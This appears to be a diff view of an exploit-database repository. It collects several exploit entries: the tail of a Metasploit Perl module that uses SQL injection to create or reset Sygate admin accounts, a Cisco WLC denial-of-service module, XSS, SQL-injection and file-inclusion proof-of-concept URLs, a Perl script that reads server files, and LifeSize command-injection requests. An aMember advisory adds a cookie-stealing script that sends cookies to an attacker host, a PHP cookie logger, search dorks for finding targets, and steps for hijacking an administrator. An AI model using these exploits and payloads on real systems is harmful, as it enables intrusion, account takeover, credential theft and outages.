$self->PrintLine("[*] Establishing a connection to the target...");
$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ /HTTP\/1\..\s+200/) {
$self->PrintLine("[*] Vulnerable server detected!");
return $self->CheckCode('Confirmed');
} elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
$self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Generic error...");
return $self->CheckCode('Generic');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $vhost = $self->VHost;
my $target_port = $self->GetVar('RPORT');
my $servlet = $self->GetVar('SERVLET');
my $login = $self->GetVar('LOGIN');
my $passwd = $self->GetVar('PASSWD');
my $target = $self->Targets->[$self->GetVar('TARGET')];
if (! $HAS_SHA1) {
$self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
return;
}
# The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
my $sha1 = sha1($login.$passwd);
$sha1 =~ s/./sprintf("%02x", ord($&))/ges;
$sha1 = "0x".uc($sha1);
# Maximum level of privileges
my $privs = "255";
my %sqlpayloads =
(
# Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
'add_account' =>
"insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
"AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
"values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
# Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
'reset_all' =>
"update CMS35.Admin set Password=cast('AA' as varbinary)",
# Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
'change_user_passwd' =>
"update CMS35.Admin set Password=$sha1 where LoginName='$login'",
);
my $payload = $sqlpayloads{ $target->[1] };
# Inject our payload
$servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
my $request =
"GET $servlet HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Establishing a connection to the target...");
$self->PrintLine(' ');
$s->Send($request);
my $results = $s->Recv(-1, 20);
if ($results =~ /HTTP\/1\.. 200 OK/im) {
# Seems to be fine ;-)
$self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
} else {
$self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
}
$s->Close();
return;
}
sub URLEncode {
my $self = shift;
my $data = shift;
my $res;
foreach my $c (unpack('C*', $data)) {
if (
($c >= 0x30 && $c <= 0x39) ||
($c >= 0x41 && $c <= 0x5A) ||
($c >= 0x61 && $c <= 0x7A)
) {
$res .= chr($c);
} else {
$res .= sprintf("%%%.2x", $c);
}
}
return $res;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
return $name;
}
1;
# milw0rm.com [2006-04-15]

9
platforms/cgi/webapps/32430.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31436/info
WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WhoDomLite 1.1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search

104
platforms/hardware/dos/9268.rb
View file

@ -1,52 +1,52 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0\r\n" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "\r\n")
disconnect
end
end
# milw0rm.com [2009-07-27]
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco WLC 4200
HTTP server. By sending a GET request with long authentication data, the
device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
},
'Author' => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5949 $',
'References' =>
[
[ 'BID', '???'],
[ 'CVE', '???'],
[ 'URL', 'http://www.cisco.com/?????'],
],
'DisclosureDate' => 'January 26 2009'))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit =
"GET /screens/frameset.html HTTP/1.0\r\n" +
"Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
sock.put(sploit + "\r\n")
disconnect
end
end
# milw0rm.com [2009-07-27]

9
platforms/jsp/webapps/32423.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test

9
platforms/jsp/webapps/32424.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E

9
platforms/jsp/webapps/32425.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31410/info
OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to OpenNMS 1.5.94 are vulnerable.
http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.*

11
platforms/php/webapps/32418.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31401/info
EasyRealtorPRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION
http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5
http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5

101
platforms/php/webapps/32419.pl Executable file
View file

@ -0,0 +1,101 @@
source: http://www.securityfocus.com/bid/31403/info
Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Libra File Manager 2.0 and prior versions are available.
#! /usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Program: Libra PHP File Manager
# Version: <= 1.18
# File affected: fileadmin.php
# Download: http://file.sourceforge.net
#
#
# Found by Pepelux <pepelux[at]enye-sec.org>
# eNYe-Sec - www.enye-sec.org
# Greetings to Ka0x for help me with the perl code :)
#
# You can scale directories and read any file that you have permissions
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
print "\e[2J";
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
my ($host, $path, $action) = @ARGV ;
unless($ARGV[2]) {
print "Usage: perl $0 <host> <path> <action>\n";
print "\tex: perl $0 http://www.example.com /etc/ list\n";
print "\tex: perl $0 http://www.example.com /etc/passwd edit\n";
print "Actions:\n";
print " list:\n";
print " edit:\n\n";
exit 1;
}
$ua->agent("$0/0.1 " . $ua->agent);
$host = "http://".$host if ($host !~ /^http:/);
$path = $path."/" if ($action eq "list" && $path !~ /\/$/);
$op = "home" if ($action == "list");
if ($action eq "edit") {
$aux = $path;
$directory = "";
do {
$x = index($aux, "/");
$y = length($aux) - $x;
$directory .= substr($aux, 0, $x+1);
$aux = substr($aux, $x+1, $y);
} until ($x == -1);
$path = $directory;
$file = $aux;
$op = "edit";
}
$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path;
$url .= "&fename=".$file if ($action eq "edit");
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
$result = $res->content;
if ($action eq "edit") {
print "Viewing $path$file:\n";
print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s);
}
else {
print "Files in $path:\n";
$x = index($result, "Files:") + 6;
$result = substr($result, $x, length($result)-$x);
$result =~ s/<[^>]*>//g;
$result =~ s/Filename//g;
$result =~ s/Size//g;
$result =~ s/Edit//g;
$result =~ s/Rename//g;
$result =~ s/Delete//g;
$result =~ s/Move//g;
$result =~ s/View//g;
$result =~ s/Open//g;
$result =~ s/\d*//g;
$result =~ s/\s+/\n/g;
$x = index($result, "Copyright");
$result = substr($result, 0, $x);
print $result;
}
}
else { print "Error: " . $res->status_line . "\n";}

9
platforms/php/webapps/32421.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31407/info
FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to FlatPress 0.804.1 are vulnerable.
<form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form>

13
platforms/php/webapps/32422.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31408/info
Vikingboard is prone to an unauthorized-access vulnerability.
Successfully exploiting this issue can allow attackers to register and log in as existing users.
Vikingboard 0.2 Beta is vulnerable; other versions may also be affected.
The following example account registration data is available:
Username: [username][whitespace characters]NULL
Password: [password]
E-Mail: [E-Mail]

9
platforms/php/webapps/32427.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31419/info
Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Barcode Generator 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt?

7
platforms/php/webapps/32431.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31437/info
Lyrics Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search_results.php?k= XSS_CODE

10
platforms/php/webapps/32432.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31438/info
Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example is available:
http://www.example.com/search.php
in search box code Xss

10
platforms/php/webapps/32433.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31441/info
Membership Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/stuffs.php?category= XSS_CODE
http://www.example.com/search.php
in search box code Xss

7
platforms/php/webapps/32434.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31442/info
Recipe Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/search.php?keyword= XSS_HACKING

82
platforms/php/webapps/32437.txt Executable file
View file

@ -0,0 +1,82 @@
LifeSize UVC 1.2.6 authenticated vulnerabilities
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/ping/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
 
The above POST results in a response containing:
<span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
 
 
 
 
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/trace/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
 
Results in the following error:
gowww-dataogle.com: Name or service not known
 
 
 
 
 
 
RCE as www-data:
 
POST /server-admin/operations/diagnose/dns/ HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
 
Results in the following results:
; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
 
;; QUESTION SECTION:
;gowww-dataogle.com. IN ANY
 
;; AUTHORITY SECTION:
com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
 
;; Query time: 21 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Fri Mar 21 10:26:21 2014
;; MSG SIZE rcvd: 109

38
platforms/php/webapps/5762.txt
View file

@ -1,19 +1,19 @@
--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack
email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting
# milw0rm.com [2008-06-09]
--------------------------------------
Pro Manager 0.73 Local File Inclusion Vuln
--------------------------------------
http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz
--------------------------------------
By : Stack
email : Wanted
--------------------------------------
Exploit :
http://localhost/path/inc/config.php?language=../../../../[without php extention]
http://localhost/path/inc/config.php?language=../../../../etc/passwd%00
--------------------------------------
thnx allah
Greats to all arabians haxors :d
D-S.Morocco Is The Best :d
Waiting
# milw0rm.com [2008-06-09]

432
platforms/php/webapps/8820.txt
View file

@ -1,216 +1,216 @@
AMember - Multiple Vulnerabilities
Version Affected: 3.1.7 (Apr-10-2009) (newest)
Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.
aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.
Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.
Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)
Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006
Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006
External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo
-:: The Advisory ::-
Version Information:
http://www.website.tld/amember/docs/changelog.txt
Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
- More files are affected. (discloses full path to the file)
Cross Site Scripting (admin only - might not survive a login screen!)
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?status="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?letter="><script>alert(0)</script>
http://www.website.tld/amember/admin/users.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/setup.php?notebook=<script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/products.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/protect.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/coupons.php?action=<script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="><script>alert(0)</script>
http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl=<script>alert(0)</script>
http://www.website.tld/amember/aff.php?action=<script>alert(0)</script> (this might only affect attacker)
- More files might be affected.
HTML Injection: (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/amember/signup.php (first- and last-name)
http://www.website.tld/amember/aff_signup.php (first- and last-name)
http://www.website.tld/amember/profile.php (first- and last-name)
HTML Injection Exception: (this injection might only be possible to be seen by the attacker)
http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too)
Affeced Sites (by HTML Injection):
http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive)
http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection)
http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME
-- More files might be affected.
SQL Injection: (requires admin access)
http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales
http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL'
-- More files might be affected, the depth of SQL Injection was not checked!
-:: Solution ::-
All the files are encrypted according to CGI Systems' website.
Questions and answers (quote)
I've downloaded aMember, but the source code is corrupted. How can I download it again ?
The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology
Which essentially mean i was unable to find any solution to the problem.
I believe this vulnerability might be exploited in the wild due to it is very
easy to find and take advantage of. (if you know what you're looking for)
Addition: The most easy solution would be to use a regular expression to fix this issue.
-:: Ways of abusing the HTML Injection and XSS ::-
The following are examples of what you can input as first- and/or last-name:
"><SCRIPT SRC=//intern0t.net/.j>
- Works only in FireFox and NetScape 8.1-G (Gecko)
Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based
partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE,
Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is
especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is
valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
Firstname: "><script src="//intern0t.net/.j
Lastname: "></script> </
- Works in FireFox but should work in all browsers.
Firstname: "><iframe src="http://google.com
Lastname: "></iframe> </
- Works in all browsers.
Firstname: "><iframe src="//intern0t.net
Lastname: "></iframe> </
- Should work in all browsers as well. (tested in FireFox)
The following is an example of how a cookie stealer will work in conjunction with the exploit:
<script>document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie;</script>
- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work.
-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm
CookieLogger:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf");
?>
When you have gotten a hash from the admin of the victim site you can issue:
Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie)
What's the first thing you could do as admin?
http://www.website.tld/amember/admin/backup.php
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
4) Make your last name:
"></script> </
5) Make your username:
aaaaaaaaa
6) After signing up, go to profile.php and make sure the first- and last-name are correct.
7) Wait or social engineer the administrator to click: "Browse Users" in his admin panel, that's all!
Conclusion:
The vendor was (originally) not contacted due to they have encrypted all of
the files and because i believe in full disclosure and open source!
The vendor was contacted the 25th May due to the vulnerability might be
exploited more than usual in the wild after public disclosure the 14th May.
Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1018-intern0t-amember-3-1-7-multiple-vulnerabilities.html
Disclosure Information:
- Vulnerabilities found early start of May 2009.
- Advisory finished and published 14th May on InterN0T.
- Bugtraq (SecurityFocus) and Milw0rm contacted the 24th May.
- OSVDB, CVE (Mitre) and CGI Systems contacted the 25th May.
# milw0rm.com [2009-05-29]
AMember - Multiple Vulnerabilities
Version Affected: 3.1.7 (Apr-10-2009) (newest)
Info: aMember is a flexible membership and subscription management PHP script. It has support for
PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling,
Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and
allows you to setup paid-membership areas on your site. It can also be used without any payment
system - you can manage users manually.
aMember Pro also supports integration plugins to link users database with third-party scripts,
for example vBulletin, Joomla, WordPress (see list of integration plugins).
aMember is a perfect membership software for selling digital subscriptions and downloads.
Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS.
Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :)
Accurate Googled0rk: (fewer results)
http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006
Inaccurate Googled0rk: (more results)
http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006
External Links:
http://www.amember.com/
http://www.amember.com/p/Main/Download
http://www.amember.com/p/Main/Demo
-:: The Advisory ::-
Version Information:
http://www.website.tld/amember/docs/changelog.txt
Information Disclosure:
http://www.website.tld/amember/docs/tester.php
http://www.website.tld/amember/setup.php?step='
http://www.website.tld/amember/admin/report.php?report=' (admin only)
